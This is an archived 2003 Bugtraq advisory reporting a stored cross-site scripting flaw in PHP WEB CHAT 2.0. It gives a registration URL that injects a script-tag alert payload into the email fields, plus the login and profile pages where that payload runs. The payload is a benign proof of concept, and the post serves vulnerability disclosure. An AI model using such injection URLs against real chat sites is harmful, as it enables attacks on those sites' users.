[29455] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

CSS in PHP WEB CHAT

daemon@ATHENA.MIT.EDU (Over_G)
Tue Mar 25 12:14:48 2003

From: "Over_G" <overg@mail.ru>
To: vuln@security.nnov.ru, bugtraq@securityfocus.com
Mime-Version: 1.0
Date: Tue, 25 Mar 2003 12:11:24 +0300
Reply-To: "Over_G" <overg@mail.ru>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id: <E18xkSq-0008J9-00@f12.mail.ru>

Product: PHP WEB CHAT
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------


Actions:

1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr*pt>

2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG

3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG




Contacts: www.overg.com www.dwcgr0up.com
          irc.zaingandol.org #DWC
          ogprog@ukr.net


Best regards, Over G[DWC Gr0up]


P.S. Sorry for my English :)

home	help	back	first	fref	pref	prev	next	nref	lref	last	post